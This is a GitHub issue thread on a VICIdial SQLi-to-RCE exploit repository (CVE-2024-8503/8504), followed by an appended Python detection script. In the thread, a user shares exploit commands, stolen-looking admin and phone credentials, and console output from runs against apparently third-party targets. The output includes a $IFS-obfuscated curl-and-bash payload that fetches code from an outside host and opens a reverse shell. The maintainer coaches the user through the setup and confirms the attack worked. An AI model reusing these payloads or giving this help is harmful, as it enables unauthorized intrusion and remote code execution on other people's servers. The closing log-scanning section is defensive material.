Chocapikk / CVE-2024-8504

VICIdial Unauthenticated SQLi to RCE Exploit (CVE-2024-8503 and CVE-2024-8504)

what is server ip. wh #4

Open mohamadtay opened 1 week ago

mohamadtay commented 1 week ago

I can't understand what you mean by server IP (-wh). I put the same as my IP (-lh) for -wh. I do not know what it is, so I bought a VPS, installed PHP and an Apache server on it, set its IP as -wh, and for -wp I set HTTP port 80.

I think the problem is with -wh and -wp; I do not know what they are or how to set them correctly. For -lh, I installed nc on my Linux VPS to receive the shell connection from the target; -lp is 1594 (`nc -lvv 1594`).

```
python3.8 exploit.py -u https://mytarget.com -wh 80.94.93.246 -wp 80 -lh 80.94.93.246 -lp 1594 -un admin -pw ba0631cce2d85a37 -b

    =============================================
    |           EXPLOIT CVE-2024-8504           |
    |     Unauthenticated SQLi to RCE Exploit   |
    |            Found by:  KoreLogic           |
    |           Modded by:  Chocapikk           |
    =============================================

    SQLi Command:
    python exploit.py -u https://example.org

    RCE Command (Authenticated):
    python exploit.py -b -u https://example.org \
        -wh <webserver IP> -wp <webserver port> \
        -lh <your IP> -lp <your listener port>  \
        -un <admin username> -pw <admin password>

    =============================================

[*] Using provided credentials for exploitation...
[+] Authenticated successfully as user "admin"
[+] Updated user settings to increase privileges
[+] Updated system settings
[+] Created dummy campaign "Armstrong-Ramos Logistics"
[+] Updated dummy campaign settings
[+] Created dummy list for campaign
[+] Found phone credentials: 1001:see123
[!] Could not find the required dynamic fields, constructing manually
[+] Manually constructed dynamic field names: MGR_login20241012, MGR_pass20241012
[+] Entered "manager" credentials to override shift enforcement
[+] Authenticated as agent using phone credentials
[-] Error retrieving session_name or session_id: list index out of range
[*] Deleting campaign 'Armstrong-Ramos Logistics' with ID 969573
[+] Campaign deleted successfully.
[root@localhost CVE-2024-8504]#
```

Chocapikk commented 1 week ago

?????

Chocapikk commented 1 week ago

@mohamadtay I noticed that it's not my code, it's this one

https://github.com/havokzero/ViciDial

Seems like there's a lot of stuff that's nonsense

mohamadtay commented 1 week ago

I am so sorry. I updated it.

Chocapikk commented 1 week ago

You don't need to install/use PHP or Apache on your VPS. The exploit will automatically create the web server once the payload is delivered to the Vicidial instance. From what I see in your test, you're having an issue when trying to connect as an agent towards the end of the exploitation, which is likely why it's not working. I recommend trying another instance or setting up a local lab since this error is quite common and doesn't have a clear solution.

Your configuration is correct for running the exploit. You can execute it directly from your VPS, where the web server will be set up as part of the process, along with the reverse shell listener. There's no need for additional setup, the exploit handles everything. Just ensure the Vicidial instance you're targeting is exploitable, and it should work as expected.

mohamadtay commented 1 week ago

What I understood from your explanation: -wh and -wp are the addresses of my device, and it is not required that they contain anything; it is just an IP address with a random port? I've had the same problem on more than one target, it is the same error, and all targets work fine with CVE-2024-8503.

mohamadtay commented 1 week ago

Why does it take a long time to get a response?

```
[*] Using provided credentials for exploitation...
[+] Authenticated successfully as user "superuser"
[+] Updated user settings to increase privileges
[+] Updated system settings
[+] Created dummy campaign "Brown-Moore Queue"
[+] Updated dummy campaign settings
[+] Created dummy list for campaign
[+] Found phone credentials: 1001:1001
<Response [200]>
[+] Retrieved dynamic field names: MGR_login20241012, MGR_pass20241012
[+] Entered "manager" credentials to override shift enforcement
[+] Authenticated as agent using phone credentials
$(curl$IFS@80.94.93.246:880$IFS-o$IFS.yu6o&&bash$IFS.yu6o)
[+] Session Name: 1728730538_100114608511, Session ID: 8600051
[+] Recording ID: 15434 retrieved successfully
[~] MonitorConf command sent for Channel Local/8309@default on 88.99.94.156 Filename: $(curl$IFS@80.94.93.246:880$IFS-o$IFS.yu6o&&bash$IFS.yu6o) RecorDing_ID: 15434 RECORDING WILL LAST UP TO 60 MINUTES

[*] Deleting campaign 'Brown-Moore Queue' with ID 173762
[+] Campaign deleted successfully.
[*] Listening for incoming connections...
[*] Starting Netcat listener on port 1596
[*] Webserver started at 80.94.93.246:880
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1596
Ncat: Listening on 0.0.0.0:1596
ls
```

Chocapikk commented 1 week ago

Here in your test the exploitation worked, you have to wait at least 2-3 minutes for the remote cronjob to run

Chocapikk commented 1 week ago

> What I understood from your explanation. The -wh, -wp are the addresses of my device, and it is not required that they contain anything. It is just an IP address with random port ?

No this is required. This is necessary for your payload on your webserver to be executed on the remote machine. Your command is good.
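The console output quoted in this thread shows what a defender should be looking for: the RCE stage lands a shell command substitution, with spaces replaced by `$IFS`, in the recording `Filename` passed through the MonitorConf call, and the payload is only fetched and executed minutes later when a remote cronjob picks it up. The following is an added detection example written for this issue; it is not part of the exploit repository or of VICIdial. The sample lines are constructed and modelled on the console output above, with documentation-range IPs, and the `Filename:` field layout is an assumption taken from that output rather than from VICIdial's own log format.

```python
import re

# Constructed sample lines (not real VICIdial logs), modelled on the
# "MonitorConf command sent ... Filename: ..." output quoted in the thread.
SAMPLE_LINES = [
    "[~] MonitorConf command sent for Channel Local/8309@default on 192.0.2.20 "
    "Filename: 20241012-100114_8600051_1001 RecorDing_ID: 15433",
    "[~] MonitorConf command sent for Channel Local/8309@default on 192.0.2.20 "
    "Filename: $(curl$IFS@203.0.113.10:880$IFS-o$IFS.yu6o&&bash$IFS.yu6o) RecorDing_ID: 15434",
    "[~] MonitorConf command sent for Channel Local/8309@default on 192.0.2.20 "
    "Filename: `id` RecorDing_ID: 15435",
]

# Assumed field layout: "Filename: <value>" where the value contains no
# whitespace (the observed payload avoids spaces by using $IFS).
FILENAME_RE = re.compile(r"Filename:\s*(\S+)")

# A legitimate recording filename is digits, letters, '_', '-' and '.'.
SAFE_FILENAME_RE = re.compile(r"[A-Za-z0-9_.\-]+")


def check_filename(name: str) -> list[str]:
    """Return the reasons a recording filename looks like shell injection.

    An empty list means the name matches the expected filename alphabet and
    carries none of the command-substitution markers seen in the thread.
    """
    reasons = []
    if re.search(r"\$\(|`", name):
        reasons.append("shell command substitution")
    if "$IFS" in name:
        reasons.append("$IFS whitespace obfuscation")
    if re.search(r"\b(curl|wget)\b", name) and re.search(r"\b(bash|sh)\b", name):
        reasons.append("download-and-execute pattern")
    if not SAFE_FILENAME_RE.fullmatch(name):
        reasons.append("characters outside expected filename alphabet")
    return reasons


def scan(lines: list[str]) -> list[dict]:
    """Scan log lines and report every MonitorConf filename that is suspicious.

    Each hit records the 1-based line number, the extracted filename and the
    reasons, so an analyst can pivot to the session and campaign on that line.
    """
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = FILENAME_RE.search(line)
        if not match:
            continue
        name = match.group(1)
        reasons = check_filename(name)
        if reasons:
            hits.append({"line": lineno, "filename": name, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"line {hit['line']}: {hit['filename']} -> {', '.join(hit['reasons'])}")
```

The alphabet check is the one that generalises: it flags any filename that could not have been produced by the normal recording path, whether or not the attacker used the exact `$(curl ... && bash ...)` form quoted here, so it is the rule worth keeping even if the others are tuned down for noise. Because execution is deferred to the cronjob, this field is also worth alerting on at write time rather than waiting for an outbound connection from the VICIdial host.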